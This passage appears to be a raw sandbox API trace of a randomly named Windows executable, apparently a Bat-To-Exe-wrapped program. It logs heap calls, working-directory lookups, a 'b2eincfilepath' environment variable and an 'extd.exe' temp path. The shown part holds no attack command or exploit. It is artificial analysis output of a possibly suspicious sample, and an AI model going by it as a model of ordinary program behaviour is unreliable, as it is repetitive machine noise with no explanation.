hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68638 | out: hHeap=0x2a60000) returned 1 [0075.689] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a677f8 | out: hHeap=0x2a60000) returned 1 [0075.689] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68050 | out: hHeap=0x2a60000) returned 1 [0075.689] GetLastError () returned 0x0 [0075.689] SetLastError (dwErrCode=0x0) [0075.689] GetLastError () returned 0x0 [0075.689] SetLastError (dwErrCode=0x0) [0075.689] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a67828 [0075.689] GetLastError () returned 0x0 [0075.689] SetLastError (dwErrCode=0x0) [0075.689] wcslen (_String="S") returned 0x1 [0075.689] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a67720 [0075.689] GetLastError () returned 0x0 [0075.690] SetLastError (dwErrCode=0x0) [0075.690] GetLastError () returned 0x0 [0075.690] SetLastError (dwErrCode=0x0) [0075.690] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67828, Size=0xc) returned 0x2a67738 [0075.690] GetLastError () returned 0x0 [0075.690] SetLastError (dwErrCode=0x0) [0075.690] wcslen (_String="S") returned 0x1 [0075.690] wcslen (_String="e") returned 0x1 [0075.690] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67720, Size=0xe) returned 0x2a67750 [0075.690] GetLastError () returned 0x0 [0075.690] SetLastError (dwErrCode=0x0) [0075.690] GetLastError () returned 0x0 [0075.690] SetLastError (dwErrCode=0x0) [0075.690] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67738, Size=0xc) returned 0x2a676a8 [0075.690] GetLastError () returned 0x0 [0075.690] SetLastError (dwErrCode=0x0) [0075.690] wcslen (_String="Se") returned 0x2 [0075.690] wcslen (_String="l") returned 0x1 [0075.690] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67750, Size=0x10) returned 0x2a67720 [0075.690] GetLastError () returned 0x0 [0075.691] SetLastError (dwErrCode=0x0) [0075.691] GetLastError () returned 0x0 [0075.691] SetLastError (dwErrCode=0x0) [0075.691] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a676a8, Size=0xc) returned 0x2a67738 [0075.691] GetLastError () returned 0x0 [0075.691] SetLastError (dwErrCode=0x0) [0075.691] wcslen (_String="Sel") returned 0x3 [0075.691] wcslen (_String="e") returned 0x1 [0075.691] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67720, Size=0x12) returned 0x2a67e70 [0075.691] GetLastError () returned 0x0 [0075.691] SetLastError (dwErrCode=0x0) [0075.691] GetLastError () returned 0x0 [0075.691] SetLastError (dwErrCode=0x0) [0075.691] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67738, Size=0xc) returned 0x2a67720 [0075.691] GetLastError () returned 0x0 [0075.691] SetLastError (dwErrCode=0x0) [0075.691] wcslen (_String="Sele") returned 0x4 [0075.691] wcslen (_String="c") returned 0x1 [0075.691] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67e70, Size=0x14) returned 0x2a67fb0 [0075.691] GetLastError () returned 0x0 [0075.692] SetLastError (dwErrCode=0x0) [0075.692] GetLastError () returned 0x0 [0075.692] SetLastError (dwErrCode=0x0) [0075.692] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67720, Size=0xc) returned 0x2a67780 [0075.692] GetLastError () returned 0x0 [0075.692] SetLastError (dwErrCode=0x0) [0075.692] wcslen (_String="Selec") returned 0x5 [0075.692] wcslen (_String="t") returned 0x1 [0075.692] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67fb0, Size=0x16) returned 0x2a68010 [0075.692] GetLastError () returned 0x0 [0075.692] SetLastError (dwErrCode=0x0) [0075.692] GetLastError () returned 0x0 [0075.692] SetLastError (dwErrCode=0x0) [0075.692] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67780, Size=0xc) returned 0x2a67768 [0075.692] GetLastError () returned 0x0 [0075.692] SetLastError (dwErrCode=0x0) [0075.692] wcslen (_String="Select") returned 0x6 [0075.692] wcslen (_String=" ") returned 0x1 [0075.692] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68010, Size=0x18) returned 0x2a67fd0 [0075.692] GetLastError () returned 0x0 [0075.692] SetLastError (dwErrCode=0x0) [0075.692] GetLastError () returned 0x0 [0075.692] SetLastError (dwErrCode=0x0) [0075.692] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67768, Size=0xc) returned 0x2a67798 [0075.693] GetLastError () returned 0x0 [0075.693] SetLastError (dwErrCode=0x0) [0075.693] wcslen (_String="Select ") returned 0x7 [0075.693] wcslen (_String="t") returned 0x1 [0075.693] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67fd0, Size=0x1a) returned 0x2a68af8 [0075.693] GetLastError () returned 0x0 [0075.693] SetLastError (dwErrCode=0x0) [0075.693] GetLastError () returned 0x0 [0075.693] SetLastError (dwErrCode=0x0) [0075.693] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67798, Size=0xc) returned 0x2a677b0 [0075.693] GetLastError () returned 0x0 [0075.693] SetLastError (dwErrCode=0x0) [0075.693] wcslen (_String="Select t") returned 0x8 [0075.693] wcslen (_String="h") returned 0x1 [0075.693] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x1c) returned 0x2a68af8 [0075.693] GetLastError () returned 0x0 [0075.693] SetLastError (dwErrCode=0x0) [0075.693] GetLastError () returned 0x0 [0075.693] SetLastError (dwErrCode=0x0) [0075.693] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a677b0, Size=0xc) returned 0x2a67720 [0075.693] GetLastError () returned 0x0 [0075.693] SetLastError (dwErrCode=0x0) [0075.693] wcslen (_String="Select th") returned 0x9 [0075.694] wcslen (_String="e") returned 0x1 [0075.694] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x1e) returned 0x2a68af8 [0075.694] GetLastError () returned 0x0 [0075.694] SetLastError (dwErrCode=0x0) [0075.694] GetLastError () returned 0x0 [0075.694] SetLastError (dwErrCode=0x0) [0075.694] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67720, Size=0xc) returned 0x2a676f0 [0075.694] GetLastError () returned 0x0 [0075.694] SetLastError (dwErrCode=0x0) [0075.694] wcslen (_String="Select the") returned 0xa [0075.694] wcslen (_String=" ") returned 0x1 [0075.694] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x20) returned 0x2a68af8 [0075.694] GetLastError () returned 0x0 [0075.694] SetLastError (dwErrCode=0x0) [0075.694] GetLastError () returned 0x0 [0075.694] SetLastError (dwErrCode=0x0) [0075.694] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a676f0, Size=0xc) returned 0x2a676c0 [0075.694] GetLastError () returned 0x0 [0075.694] SetLastError (dwErrCode=0x0) [0075.694] wcslen (_String="Select the ") returned 0xb [0075.694] wcslen (_String="w") returned 0x1 [0075.694] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x22) returned 0x2a68af8 [0075.694] GetLastError () returned 0x0 [0075.695] SetLastError (dwErrCode=0x0) [0075.695] GetLastError () returned 0x0 [0075.695] SetLastError (dwErrCode=0x0) [0075.695] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a676c0, Size=0xc) returned 0x2a677e0 [0075.695] GetLastError () returned 0x0 [0075.695] SetLastError (dwErrCode=0x0) [0075.695] wcslen (_String="Select the w") returned 0xc [0075.695] wcslen (_String="o") returned 0x1 [0075.695] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x24) returned 0x2a68af8 [0075.695] GetLastError () returned 0x0 [0075.695] SetLastError (dwErrCode=0x0) [0075.695] GetLastError () returned 0x0 [0075.695] SetLastError (dwErrCode=0x0) [0075.695] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a677e0, Size=0xc) returned 0x2a67768 [0075.695] GetLastError () returned 0x0 [0075.695] SetLastError (dwErrCode=0x0) [0075.695] wcslen (_String="Select the wo") returned 0xd [0075.695] wcslen (_String="r") returned 0x1 [0075.695] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x26) returned 0x2a68af8 [0075.695] GetLastError () returned 0x0 [0075.695] SetLastError (dwErrCode=0x0) [0075.696] GetLastError () returned 0x0 [0075.696] SetLastError (dwErrCode=0x0) [0075.696] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67768, Size=0xc) returned 0x2a67798 [0075.696] GetLastError () returned 0x0 [0075.696] SetLastError (dwErrCode=0x0) [0075.696] wcslen (_String="Select the wor") returned 0xe [0075.696] wcslen (_String="k") returned 0x1 [0075.696] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x28) returned 0x2a68af8 [0075.696] GetLastError () returned 0x0 [0075.696] SetLastError (dwErrCode=0x0) [0075.696] GetLastError () returned 0x0 [0075.696] SetLastError (dwErrCode=0x0) [0075.696] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67798, Size=0xc) returned 0x2a677f8 [0075.696] GetLastError () returned 0x0 [0075.696] SetLastError (dwErrCode=0x0) [0075.696] wcslen (_String="Select the work") returned 0xf [0075.696] wcslen (_String="i") returned 0x1 [0075.696] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x2a) returned 0x2a68af8 [0075.697] GetLastError () returned 0x0 [0075.697] SetLastError (dwErrCode=0x0) [0075.697] GetLastError () returned 0x0 [0075.697] SetLastError (dwErrCode=0x0) [0075.697] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a677f8, Size=0xc) returned 0x2a67858 [0075.697] GetLastError () returned 0x0 [0075.697] SetLastError (dwErrCode=0x0) [0075.697] wcslen (_String="Select the worki") returned 0x10 [0075.697] wcslen (_String="n") returned 0x1 [0075.697] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x2c) returned 0x2a68af8 [0075.697] GetLastError () returned 0x0 [0075.697] SetLastError (dwErrCode=0x0) [0075.697] GetLastError () returned 0x0 [0075.697] SetLastError (dwErrCode=0x0) [0075.697] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67858, Size=0xc) returned 0x2a67708 [0075.697] GetLastError () returned 0x0 [0075.697] SetLastError (dwErrCode=0x0) [0075.697] wcslen (_String="Select the workin") returned 0x11 [0075.697] wcslen (_String="g") returned 0x1 [0075.698] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x2e) returned 0x2a68af8 [0075.698] GetLastError () returned 0x0 [0075.698] SetLastError (dwErrCode=0x0) [0075.698] GetLastError () returned 0x0 [0075.698] SetLastError (dwErrCode=0x0) [0075.698] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67708, Size=0xc) returned 0x2a67720 [0075.698] GetLastError () returned 0x0 [0075.698] SetLastError (dwErrCode=0x0) [0075.698] wcslen (_String="Select the working") returned 0x12 [0075.698] wcslen (_String=" ") returned 0x1 [0075.698] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x30) returned 0x2a68af8 [0075.698] GetLastError () returned 0x0 [0075.698] SetLastError (dwErrCode=0x0) [0075.698] GetLastError () returned 0x0 [0075.698] SetLastError (dwErrCode=0x0) [0075.698] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67720, Size=0xc) returned 0x2a677f8 [0075.698] GetLastError () returned 0x0 [0075.698] SetLastError (dwErrCode=0x0) [0075.698] wcslen (_String="Select the working ") returned 0x13 [0075.699] wcslen (_String="d") returned 0x1 [0075.699] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x32) returned 0x2a68af8 [0075.699] GetLastError () returned 0x0 [0075.699] SetLastError (dwErrCode=0x0) [0075.699] GetLastError () returned 0x0 [0075.699] SetLastError (dwErrCode=0x0) [0075.699] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a677f8, Size=0xc) returned 0x2a676d8 [0075.699] GetLastError () returned 0x0 [0075.699] SetLastError (dwErrCode=0x0) [0075.699] wcslen (_String="Select the working d") returned 0x14 [0075.699] wcslen (_String="i") returned 0x1 [0075.699] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x34) returned 0x2a68af8 [0075.699] GetLastError () returned 0x0 [0075.699] SetLastError (dwErrCode=0x0) [0075.699] GetLastError () returned 0x0 [0075.699] SetLastError (dwErrCode=0x0) [0075.699] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a676d8, Size=0xc) returned 0x2a67708 [0075.699] GetLastError () returned 0x0 [0075.699] SetLastError (dwErrCode=0x0) [0075.699] wcslen (_String="Select the working di") returned 0x15 [0075.700] wcslen (_String="r") returned 0x1 [0075.700] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x36) returned 0x2a68af8 [0075.700] GetLastError () returned 0x0 [0075.700] SetLastError (dwErrCode=0x0) [0075.700] GetLastError () returned 0x0 [0075.700] SetLastError (dwErrCode=0x0) [0075.700] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67708, Size=0xc) returned 0x2a67798 [0075.700] GetLastError () returned 0x0 [0075.700] SetLastError (dwErrCode=0x0) [0075.700] wcslen (_String="Select the working dir") returned 0x16 [0075.700] wcslen (_String="e") returned 0x1 [0075.700] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x38) returned 0x2a68af8 [0075.700] GetLastError () returned 0x0 [0075.700] SetLastError (dwErrCode=0x0) [0075.700] GetLastError () returned 0x0 [0075.700] SetLastError (dwErrCode=0x0) [0075.700] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67798, Size=0xc) returned 0x2a677c8 [0075.700] GetLastError () returned 0x0 [0075.700] SetLastError (dwErrCode=0x0) [0075.700] wcslen (_String="Select the working dire") returned 0x17 [0075.700] wcslen (_String="c") returned 0x1 [0075.700] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x3a) returned 0x2a68af8 [0075.700] GetLastError () returned 0x0 [0075.700] SetLastError (dwErrCode=0x0) [0075.700] GetLastError () returned 0x0 [0075.700] SetLastError (dwErrCode=0x0) [0075.701] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a677c8, Size=0xc) returned 0x2a67768 [0075.701] GetLastError () returned 0x0 [0075.701] SetLastError (dwErrCode=0x0) [0075.701] wcslen (_String="Select the working direc") returned 0x18 [0075.701] wcslen (_String="t") returned 0x1 [0075.701] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x3c) returned 0x2a68af8 [0075.701] GetLastError () returned 0x0 [0075.701] SetLastError (dwErrCode=0x0) [0075.701] GetLastError () returned 0x0 [0075.701] SetLastError (dwErrCode=0x0) [0075.701] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67768, Size=0xc) returned 0x2a677c8 [0075.701] GetLastError () returned 0x0 [0075.701] SetLastError (dwErrCode=0x0) [0075.701] wcslen (_String="Select the working direct") returned 0x19 [0075.701] wcslen (_String="o") returned 0x1 [0075.701] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x3e) returned 0x2a68af8 [0075.701] GetLastError () returned 0x0 [0075.701] SetLastError (dwErrCode=0x0) [0075.701] GetLastError () returned 0x0 [0075.701] SetLastError (dwErrCode=0x0) [0075.702] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a677c8, Size=0xc) returned 0x2a67870 [0075.702] GetLastError () returned 0x0 [0075.702] SetLastError (dwErrCode=0x0) [0075.702] wcslen (_String="Select the working directo") returned 0x1a [0075.702] wcslen (_String="r") returned 0x1 [0075.702] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x40) returned 0x2a68af8 [0075.702] GetLastError () returned 0x0 [0075.702] SetLastError (dwErrCode=0x0) [0075.702] GetLastError () returned 0x0 [0075.702] SetLastError (dwErrCode=0x0) [0075.702] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67870, Size=0xc) returned 0x2a67858 [0075.702] GetLastError () returned 0x0 [0075.702] SetLastError (dwErrCode=0x0) [0075.702] wcslen (_String="Select the working director") returned 0x1b [0075.702] wcslen (_String="y") returned 0x1 [0075.702] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a68af8, Size=0x42) returned 0x2a68af8 [0075.702] GetLastError () returned 0x0 [0075.702] SetLastError (dwErrCode=0x0) [0075.702] GetLastError () returned 0x0 [0075.702] SetLastError (dwErrCode=0x0) [0075.702] wcslen (_String="Select the working directory") returned 0x1c [0075.702] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x42) returned 0x2a68b48 [0075.702] GetLastError () returned 0x0 [0075.703] SetLastError (dwErrCode=0x0) [0075.703] GetLastError () returned 0x0 [0075.703] SetLastError (dwErrCode=0x0) [0075.703] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2a60608 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0075.703] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x3a) returned 0x2a68b98 [0075.703] GetLastError () returned 0x0 [0075.703] SetLastError (dwErrCode=0x0) [0075.703] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\") returned 0x18 [0075.703] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68b98 | out: hHeap=0x2a60000) returned 1 [0075.703] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68b48 | out: hHeap=0x2a60000) returned 1 [0075.703] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x3a) returned 0x2a68c00 [0075.703] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0075.703] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68af8 | out: hHeap=0x2a60000) returned 1 [0075.704] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a67858 | out: hHeap=0x2a60000) returned 1 [0075.704] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68c00 | out: hHeap=0x2a60000) returned 1 [0075.704] GetLastError () returned 0x0 [0075.704] SetLastError (dwErrCode=0x0) [0075.704] GetLastError () returned 0x0 [0075.704] SetLastError (dwErrCode=0x0) [0075.704] wcslen (_String="Select the extraction path") returned 0x1a [0075.704] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x3e) returned 0x2a69308 [0075.704] GetLastError () returned 0x0 [0075.704] SetLastError (dwErrCode=0x0) [0075.704] GetLastError () returned 0x0 [0075.704] SetLastError (dwErrCode=0x0) [0075.704] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2a60608 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0075.704] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x3a) returned 0x2a68cd8 [0075.704] GetLastError () returned 0x0 [0075.704] SetLastError (dwErrCode=0x0) [0075.704] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\") returned 0x18 [0075.704] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68cd8 | out: hHeap=0x2a60000) returned 1 [0075.704] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69308 | out: hHeap=0x2a60000) returned 1 [0075.704] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x3a) returned 0x2a69278 [0075.704] PathRemoveBackslashW (in: pszPath="C:\\Users\\FD1HVy\\Desktop\\" | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned="" [0075.704] GetLastError () returned 0x0 [0075.704] SetLastError (dwErrCode=0x0) [0075.704] GetLastError () returned 0x0 [0075.704] SetLastError (dwErrCode=0x0) [0075.704] GetLastError () returned 0x0 [0075.705] SetLastError (dwErrCode=0x0) [0075.705] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0075.705] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x38) returned 0x2a68af8 [0075.705] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x2710) returned 0x10e07c8 [0075.705] GetShortPathNameW (in: lpszLongPath="C:\\Users\\FD1HVy\\Desktop", lpszShortPath=0x10e07c8, cchBuffer=0x2710 | out: lpszShortPath="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0075.705] GetLastError () returned 0x0 [0075.705] SetLastError (dwErrCode=0x0) [0075.705] GetLastError () returned 0x0 [0075.705] SetLastError (dwErrCode=0x0) [0075.706] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x38) returned 0x2a696f8 [0075.706] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e07c8 | out: hHeap=0x10e0000) returned 1 [0075.706] GetLastError () returned 0x0 [0075.706] SetLastError (dwErrCode=0x0) [0075.706] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0075.706] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68af8 | out: hHeap=0x2a60000) returned 1 [0075.706] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a696f8 | out: hHeap=0x2a60000) returned 1 [0075.706] SetEnvironmentVariableW (lpName="b2eincfilepath", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0075.706] GetLastError () returned 0x0 [0075.706] SetLastError (dwErrCode=0x0) [0075.706] GetLastError () returned 0x0 [0075.706] SetLastError (dwErrCode=0x0) [0075.706] wcslen (_String="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\") returned 0x35 [0075.706] wcslen (_String="extd.exe") returned 0x8 [0075.706] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a60528, Size=0x84) returned 0x2a69b58 [0075.706] GetLastError () returned 0x0 [0075.706] SetLastError (dwErrCode=0x0) [0075.707] GetLastError () returned 0x0 [0075.707] SetLastError (dwErrCode=0x0) [0075.707] GetLastError () returned 0x0 [0075.707] SetLastError (dwErrCode=0x0) [0075.707] GetLastError () returned 0x0 [0075.707] SetLastError (dwErrCode=0x0) [0075.707] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x2a60608, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\o4gkftfmo8yrukhr.exe")) returned 0x2c [0075.707] wcscmp (_String1="C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe", _String2="\\\\?\\") returned -1 [0075.707] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x62) returned 0x2a69be8 [0075.707] PathQuoteSpacesW (in: lpsz="C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe" | out: lpsz="C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe") returned 0 [0075.707] GetLastError () returned 0x0 [0075.707] SetLastError (dwErrCode=0x0) [0075.707] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe") returned 0x2c [0075.707] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x62) returned 0x2a69c58 [0075.707] GetLastError () returned 0x0 [0075.707] SetLastError (dwErrCode=0x0) [0075.707] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe") returned 0x2c [0075.707] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69be8 | out: hHeap=0x2a60000) returned 1 [0075.707] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a69c58 | out: hHeap=0x2a60000) returned 1 [0075.707] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x62) returned 0x2a69be8 [0075.707] GetLastError () returned 0x0 [0075.707] SetLastError (dwErrCode=0x0) [0075.707] GetLastError () returned 0x0 [0075.707] SetLastError (dwErrCode=0x0) [0075.708] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a67828 [0075.708] GetLastError () returned 0x0 [0075.708] SetLastError (dwErrCode=0x0) [0075.708] wcslen (_String="@") returned 0x1 [0075.708] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0xc) returned 0x2a67738 [0075.708] GetLastError () returned 0x0 [0075.708] SetLastError (dwErrCode=0x0) [0075.708] GetLastError () returned 0x0 [0075.708] SetLastError (dwErrCode=0x0) [0075.708] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67828, Size=0xc) returned 0x2a677b0 [0075.708] GetLastError () returned 0x0 [0075.708] SetLastError (dwErrCode=0x0) [0075.708] wcslen (_String="@") returned 0x1 [0075.708] wcslen (_String="s") returned 0x1 [0075.708] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67738, Size=0xe) returned 0x2a676a8 [0075.708] GetLastError () returned 0x0 [0075.708] SetLastError (dwErrCode=0x0) [0075.708] GetLastError () returned 0x0 [0075.708] SetLastError (dwErrCode=0x0) [0075.708] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a677b0, Size=0xc) returned 0x2a67720 [0075.708] GetLastError () returned 0x0 [0075.708] SetLastError (dwErrCode=0x0) [0075.708] wcslen (_String="@s") returned 0x2 [0075.709] wcslen (_String="h") returned 0x1 [0075.709] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a676a8, Size=0x10) returned 0x2a67810 [0075.709] GetLastError () returned 0x0 [0075.709] SetLastError (dwErrCode=0x0) [0075.709] GetLastError () returned 0x0 [0075.709] SetLastError (dwErrCode=0x0) [0075.709] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67720, Size=0xc) returned 0x2a676f0 [0075.709] GetLastError () returned 0x0 [0075.709] SetLastError (dwErrCode=0x0) [0075.709] wcslen (_String="@sh") returned 0x3 [0075.709] wcslen (_String="i") returned 0x1 [0075.709] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67810, Size=0x12) returned 0x2a67f70 [0075.709] GetLastError () returned 0x0 [0075.709] SetLastError (dwErrCode=0x0) [0075.709] GetLastError () returned 0x0 [0075.709] SetLastError (dwErrCode=0x0) [0075.709] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a676f0, Size=0xc) returned 0x2a676d8 [0075.709] GetLastError () returned 0x0 [0075.709] SetLastError (dwErrCode=0x0) [0075.709] wcslen (_String="@shi") returned 0x4 [0075.709] wcslen (_String="f") returned 0x1 [0075.709] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67f70, Size=0x14) returned 0x2a67dd0 [0075.709] GetLastError () returned 0x0 [0075.709] SetLastError (dwErrCode=0x0) [0075.710] GetLastError () returned 0x0 [0075.710] SetLastError (dwErrCode=0x0) [0075.710] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a676d8, Size=0xc) returned 0x2a67870 [0075.710] GetLastError () returned 0x0 [0075.710] SetLastError (dwErrCode=0x0) [0075.710] wcslen (_String="@shif") returned 0x5 [0075.710] wcslen (_String="t") returned 0x1 [0075.710] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67dd0, Size=0x16) returned 0x2a67ed0 [0075.710] GetLastError () returned 0x0 [0075.710] SetLastError (dwErrCode=0x0) [0075.710] GetLastError () returned 0x0 [0075.710] SetLastError (dwErrCode=0x0) [0075.710] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67870, Size=0xc) returned 0x2a67768 [0075.710] GetLastError () returned 0x0 [0075.710] SetLastError (dwErrCode=0x0) [0075.710] wcslen (_String="@shift") returned 0x6 [0075.710] wcslen (_String=" ") returned 0x1 [0075.710] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67ed0, Size=0x18) returned 0x2a68050 [0075.710] GetLastError () returned 0x0 [0075.710] SetLastError (dwErrCode=0x0) [0075.710] GetLastError () returned 0x0 [0075.710] SetLastError (dwErrCode=0x0) [0075.710] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a67768, Size=0xc) returned 0x2a676a8 [0075.710] GetLastError () returned 